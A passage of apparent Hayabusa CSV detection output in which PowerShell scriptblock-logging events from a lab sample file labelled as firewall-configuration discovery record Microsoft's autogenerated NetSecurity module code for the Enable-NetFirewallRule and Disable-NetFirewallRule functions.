[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 